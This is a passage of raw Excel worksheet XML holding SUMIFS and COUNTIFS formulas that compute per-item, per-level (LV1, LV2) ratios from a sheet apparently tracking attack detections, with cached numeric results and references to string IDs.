      <c r="EZ40" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>1</v>
      </c>
      <c r="FA40" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.6666666667</v>
      </c>
    </row>
    <row r="41">
      <c r="EJ41" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ33&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ33*'(B) - Detecciones - Ataques'!HN33/('(B) - Detecciones - Ataques'!HN33+'(B) - Detecciones - Ataques'!HO33),0)</f>
        <v>0</v>
      </c>
      <c r="EK41" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ33&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ33*'(B) - Detecciones - Ataques'!HO33/('(B) - Detecciones - Ataques'!HN33+'(B) - Detecciones - Ataques'!HO33),0)</f>
        <v>0</v>
      </c>
      <c r="EM41" s="571"/>
      <c r="EW41" s="379" t="s">
        <v>633</v>
      </c>
      <c r="EX41" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*"))</f>
        <v>0.8522727273</v>
      </c>
      <c r="EY41" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="EZ41" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.8333333333</v>
      </c>
      <c r="FA41" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW41,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW41 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
    </row>
    <row r="42">
      <c r="EJ42" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ34&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ34*'(B) - Detecciones - Ataques'!HN34/('(B) - Detecciones - Ataques'!HN34+'(B) - Detecciones - Ataques'!HO34),0)</f>
        <v>1</v>
      </c>
      <c r="EK42" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ34&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ34*'(B) - Detecciones - Ataques'!HO34/('(B) - Detecciones - Ataques'!HN34+'(B) - Detecciones - Ataques'!HO34),0)</f>
        <v>0</v>
      </c>
      <c r="EM42" s="571"/>
      <c r="EW42" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="EX42" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW42)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW42 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW42)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW42 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="EY42" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW42)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW42 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW42)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW42 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="EZ42" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW42,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW42 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW42,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW42 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.5</v>
      </c>
      <c r="FA42" s="635" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="43">
      <c r="EJ43" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ35&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ35*'(B) - Detecciones - Ataques'!HN35/('(B) - Detecciones - Ataques'!HN35+'(B) - Detecciones - Ataques'!HO35),0)</f>
        <v>0</v>
      </c>
      <c r="EK43" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ35&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ35*'(B) - Detecciones - Ataques'!HO35/('(B) - Detecciones - Ataques'!HN35+'(B) - Detecciones - Ataques'!HO35),0)</f>
        <v>0</v>
      </c>
      <c r="EM43" s="571"/>
      <c r="EW43" s="379" t="s">
        <v>244</v>
      </c>
      <c r="EX43" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW43)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW43 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW43)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW43 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="EY43" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW43)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW43 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW43)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW43 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="EZ43" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW43,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW43 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW43,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW43 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FA43" s="635" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="44">
      <c r="EJ44" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ36&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ36*'(B) - Detecciones - Ataques'!HN36/('(B) - Detecciones - Ataques'!HN36+'(B) - Detecciones - Ataques'!HO36),0)</f>
        <v>0</v>
      </c>
      <c r="EK44" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ36&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ36*'(B) - Detecciones - Ataques'!HO36/('(B) - Detecciones - Ataques'!HN36+'(B) - Detecciones - Ataques'!HO36),0)</f>
        <v>0</v>
      </c>
      <c r="EM44" s="571"/>
      <c r="EW44" s="379" t="s">
        <v>427</v>
      </c>
      <c r="EX44" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EY44" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EZ44" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="FA44" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW44,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW44 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
    </row>
    <row r="45">
      <c r="EJ45" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ37&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ37*'(B) - Detecciones - Ataques'!HN37/('(B) - Detecciones - Ataques'!HN37+'(B) - Detecciones - Ataques'!HO37),0)</f>
        <v>0</v>
      </c>
      <c r="EK45" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ37&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ37*'(B) - Detecciones - Ataques'!HO37/('(B) - Detecciones - Ataques'!HN37+'(B) - Detecciones - Ataques'!HO37),0)</f>
        <v>0</v>
      </c>
      <c r="EM45" s="571"/>
      <c r="EW45" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="EX45" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW45)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW45 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW45)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW45 &amp; "*"))</f>
        <v>0.368431225</v>
      </c>
      <c r="EY45" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW45)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW45 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW45)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW45 &amp; "*"))</f>
        <v>0.4210526316</v>
      </c>
      <c r="EZ45" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW45,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW45 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW45,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW45 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.368431225</v>
      </c>
      <c r="FA45" s="635" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="46">
      <c r="EJ46" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ38&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ38*'(B) - Detecciones - Ataques'!HN38/('(B) - Detecciones - Ataques'!HN38+'(B) - Detecciones - Ataques'!HO38),0)</f>
        <v>0</v>
      </c>
      <c r="EK46" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ38&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ38*'(B) - Detecciones - Ataques'!HO38/('(B) - Detecciones - Ataques'!HN38+'(B) - Detecciones - Ataques'!HO38),0)</f>
        <v>0</v>
      </c>
      <c r="EM46" s="571"/>
      <c r="EW46" s="379" t="s">
        <v>209</v>
      </c>
      <c r="EX46" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*"))</f>
        <v>0.7179487179</v>
      </c>
      <c r="EY46" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*"))</f>
        <v>0.8461538462</v>
      </c>
      <c r="EZ46" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6388888889</v>
      </c>
      <c r="FA46" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW46,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW46 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.8571428571</v>
      </c>
    </row>
    <row r="47">
      <c r="EJ47" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ39&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ39*'(B) - Detecciones - Ataques'!HN39/('(B) - Detecciones - Ataques'!HN39+'(B) - Detecciones - Ataques'!HO39),0)</f>
        <v>0</v>
      </c>
      <c r="EK47" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ39&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ39*'(B) - Detecciones - Ataques'!HO39/('(B) - Detecciones - Ataques'!HN39+'(B) - Detecciones - Ataques'!HO39),0)</f>
        <v>0</v>
      </c>
      <c r="EM47" s="571"/>
      <c r="EW47" s="379" t="s">
        <v>664</v>
      </c>
      <c r="EX47" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*"))</f>
        <v>0.6761363636</v>
      </c>
      <c r="EY47" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW47)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW47 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="EZ47" s="621">
